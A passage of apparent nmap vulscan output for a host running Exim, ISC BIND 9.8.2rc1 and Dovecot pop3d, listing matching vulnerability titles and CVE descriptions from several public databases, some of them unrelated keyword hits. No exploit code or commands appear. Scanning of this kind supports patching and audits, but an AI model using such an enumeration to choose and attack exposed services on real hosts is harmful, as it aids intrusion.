9029| [10761] Exim daemon.c format string
9030| [8194] Exim configuration file -c command-line argument buffer overflow
9031| [7738] Exim allows attacker to hide commands in localhost names using pipes
9032| [6671] Exim "
9033| [1893] Exim MTA allows local users to gain root privileges
9034|
9035| Exploit-DB - https://www.exploit-db.com:
9036| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
9037| [15725] Exim 4.63 Remote Root Exploit
9038| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
9039| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
9040| [796] Exim <= 4.42 Local Root Exploit
9041| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
9042|
9043| OpenVAS (Nessus) - http://www.openvas.org:
9044| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
9045|
9046| SecurityTracker - https://www.securitytracker.com:
9047| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
9048| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
9049| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
9050| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
9051| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
9052| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
9053| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
9054| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
9055| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
9056| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
9057| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
9058| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
9059|
9060| OSVDB - http://www.osvdb.org:
9061| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
9062| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
9063| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
9064| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
9065| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
9066| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
9067| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
9068| [70696] Exim log.c open_log() Function Local Privilege Escalation
9069| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
9070| [69685] Exim string_format Function Remote Overflow
9071| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
9072| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
9073| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
9074| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
9075| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
9076| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
9077| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
9078| [12726] Exim -be Command Line Option host_aton Function Local Overflow
9079| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
9080| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
9081| [10032] libXpm CreateXImage Function Integer Overflow
9082| [7160] Exim .forward :include: Option Privilege Escalation
9083| [6479] Vexim COOKIE Authentication Credential Disclosure
9084| [6478] Vexim Multiple Parameter SQL Injection
9085| [5930] Exim Parenthesis File Name Filter Bypass
9086| [5897] Exim header_syntax Function Remote Overflow
9087| [5896] Exim sender_verify Function Remote Overflow
9088| [5530] Exim Localhost Name Arbitrary Command Execution
9089| [5330] Exim Configuration File Variable Overflow
9090| [1855] Exim Batched SMTP Mail Header Format String
9091|_
909226/tcp open tcpwrapped
909353/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
9094| vulscan: VulDB - https://vuldb.com:
9095| [93249] ISC BIND up to 9.8.x/9.9.9-P3/9.9.9-S5/9.10.4-P3/9.11.0 DNAME Response db.c denial of service
9096| [93015] ISC BIND up to 9.8.4/9.9.2 Packet Option DNS Packet Crash denial of service
9097| [80354] ISC BIND up to 9.8.8/9.9.8-P2/9.9.8-S3/9.10.3-P2 Address Prefix List apl_42.c denial of service
9098| [77552] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 OpenPGP Key openpgpkey_61.c denial of service
9099| [77551] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 DNSSEC Key buffer.c denial of service
9100| [13184] ISC BIND 9.8.1-P1 Smoothed Round Trip Time Algorithm DNS spoofing
9101| [9946] ISC BIND 9.8.1-P1 SRTT Algorithm privilege escalation
9102| [4443] ISC BIND up to 9.8.x Recursive Query Processor denial of service
9103| [57895] ISC BIND 9.8.0/9.8.1 Crash denial of service
9104| [4357] ISC BIND up to 9.8.x Negative Caching RRSIG RRsets denial of service
9105| [57404] ISC BIND 9.8.0 denial of service
9106| [135686] Bosch Smart Home Controller up to 9.8 Backup information disclosure
9107| [135684] Bosch Smart Home Controller up to 9.8 JSON-RPC Interface information disclosure
9108| [129940] Adobe Connect up to 9.8.1 Session Token information disclosure
9109| [117535] Synacor Zimbra Collaboration up to 8.6.0 Patch 9/8.7.11 Patch 2/8.8.7 mailboxd Error information disclosure
9110| [11371] Cisco ONS 15454 9.8.0 Controller Card denial of service
9111|
9112| MITRE CVE - https://cve.mitre.org:
9113| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
9114| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
9115| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
9116| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
9117| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
9118| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
9119| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
9120| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
9121| [CVE-2012-1033] The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack.
9122| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
9123| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
9124| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
9125| [CVE-2011-1910] Off-by-one error in named in ISC BIND 9.x before 9.7.3-P1, 9.8.x before 9.8.0-P2, 9.4-ESV before 9.4-ESV-R4-P1, and 9.6-ESV before 9.6-ESV-R4-P1 allows remote DNS servers to cause a denial of service (assertion failure and daemon exit) via a negative response containing large RRSIG RRsets.
9126| [CVE-2011-1907] ISC BIND 9.8.x before 9.8.0-P1, when Response Policy Zones (RPZ) RRset replacement is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an RRSIG query.
9127| [CVE-2010-1567] The SIP implementation on the Cisco PGW 2200 Softswitch with software before 9.8(1)S5 allows remote attackers to cause a denial of service (device crash) via a malformed header, aka Bug ID CSCsz13590.
9128|
9129| SecurityFocus - https://www.securityfocus.com/bid/:
9130| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
9131| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
9132| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
9133| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
9134| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
9135| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
9136| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
9137| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
9138| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
9139| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
9140| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
9141| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
9142| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
9143| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
9144| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
9145| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
9146| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
9147| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
9148| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
9149| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
9150| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
9151| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
9152| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
9153| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
9154| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
9155| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
9156|
9157| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9158| [85799] Cisco Unified IP Phones 9900 Series directory traversal
9159| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
9160| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
9161| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
9162| [9250] BIND 9 dns_message_findtype() denial of service
9163| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
9164| [539] Microsoft Windows 95 and Internet Explorer password disclosure
9165| [86004] ISC BIND RDATA denial of service
9166| [84767] ISC BIND denial of service
9167| [83066] ISC BIND denial of service
9168| [81504] ISC BIND AAAA denial of service
9169| [80510] ISC BIND DNS64 denial of service
9170| [79121] ISC BIND queries denial of service
9171| [78479] ISC BIND RDATA denial of service
9172| [77185] ISC BIND TCP queries denial of service
9173| [77184] ISC BIND bad cache denial of service
9174| [76034] ISC BIND rdata denial of service
9175| [73053] ISC BIND cache update policy security bypass
9176| [71332] ISC BIND recursive queries denial of service
9177| [68375] ISC BIND UPDATE denial of service
9178| [68374] ISC BIND Response Policy Zones denial of service
9179| [67665] ISC BIND RRSIG Rrsets denial of service
9180| [67297] ISC BIND RRSIG denial of service
9181| [65554] ISC BIND IXFR transfer denial of service
9182| [63602] ISC BIND allow-query security bypass
9183| [63596] ISC BIND zone data security bypass
9184| [63595] ISC BIND RRSIG denial of service
9185| [62072] ISC BIND DNSSEC query denial of service
9186| [62071] ISC BIND ACL security bypass
9187| [61871] ISC BIND anchors denial of service
9188| [60421] ISC BIND RRSIG denial of service
9189| [56049] ISC BIND out-of-bailiwick weak security
9190| [55937] ISC Bind unspecified cache poisoning
9191| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
9192| [54416] ISC BIND DNSSEC cache poisoning
9193| [52073] ISC BIND dns_db_findrdataset() denial of service
9194| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
9195| [45234] ISC BIND UDP denial of service
9196| [39670] ISC BIND inet_network buffer overflow
9197| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
9198| [37128] RHSA update for ISC BIND RRset denial of service not installed
9199| [37127] RHSA update for ISC BIND named service denial of service not installed
9200| [36275] ISC BIND DNS query spoofing
9201| [35575] ISC BIND query ID cache poisoning
9202| [35571] ISC BIND ACL security bypass
9203| [31838] ISC BIND RRset denial of service
9204| [31799] ISC BIND named service denial of service
9205| [29876] HP Tru64 ypbind core dump information disclosure
9206| [28745] ISC BIND DNSSEC RRset denial of service
9207| [28744] ISC BIND recursive INSIST denial of service
9208| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
9209| [18836] BIND hostname disclosure
9210| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
9211| [10333] ISC BIND SIG null pointer dereference denial of service
9212| [10332] ISC BIND OPT resource record (RR) denial of service
9213| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
9214| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
9215| [5814] ISC BIND "
9216| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
9217| [5462] ISC BIND AXFR host command remote buffer overflow
9218|
9219| Exploit-DB - https://www.exploit-db.com:
9220| [17376] Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability
9221| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
9222|
9223| OpenVAS (Nessus) - http://www.openvas.org:
9224| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
9225| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
9226| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
9227| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
9228| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
9229| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
9230| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
9231| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
9232| [11226] Oracle 9iAS default error information disclosure
9233|
9234| SecurityTracker - https://www.securitytracker.com:
9235| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
9236| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
9237| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
9238| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
9239| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
9240| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9241| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9242| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9243| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9244| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9245| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9246| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9247| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9248| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
9249| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
9250| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
9251| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
9252| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
9253| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
9254| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
9255| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
9256| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
9257| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
9258| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
9259| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
9260| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
9261|
9262| OSVDB - http://www.osvdb.org:
9263| [72941] Aastra 9480i IP Phone Multiple Configuration File Direct Request Information Disclosure
9264|_
926580/tcp filtered http
9266110/tcp open pop3 Dovecot pop3d
9267| vulscan: VulDB - https://vuldb.com:
9268| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
9269| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
9270| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
9271| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
9272| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
9273| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
9274| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
9275| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
9276| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
9277| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
9278| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
9279| [69835] Dovecot 2.2.0/2.2.1 denial of service
9280| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
9281| [65684] Dovecot up to 2.2.6 unknown vulnerability
9282| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
9283| [63692] Dovecot up to 2.0.15 spoofing
9284| [7062] Dovecot 2.1.10 mail-search.c denial of service
9285| [57517] Dovecot up to 2.0.12 Login directory traversal
9286| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
9287| [57515] Dovecot up to 2.0.12 Crash denial of service
9288| [54944] Dovecot up to 1.2.14 denial of service
9289| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
9290| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
9291| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
9292| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
9293| [53277] Dovecot up to 1.2.10 denial of service
9294| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
9295| [45256] Dovecot up to 1.1.5 directory traversal
9296| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
9297| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
9298| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
9299| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
9300| [40356] Dovecot 1.0.9 Cache unknown vulnerability
9301| [38222] Dovecot 1.0.2 directory traversal
9302| [36376] Dovecot up to 1.0.x directory traversal
9303| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
9304|
9305| MITRE CVE - https://cve.mitre.org:
9306| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
9307| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
9308| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
9309| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
9310| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
9311| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
9312| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
9313| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
9314| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
9315| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
9316| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
9317| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
9318| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
9319| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
9320| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
9321| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
9322| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
9323| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
9324| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
9325| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
9326| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
9327| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
9328| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
9329| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
9330| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
9331| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
9332| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
9333| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
9334| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
9335| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
9336| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
9337| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
9338| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
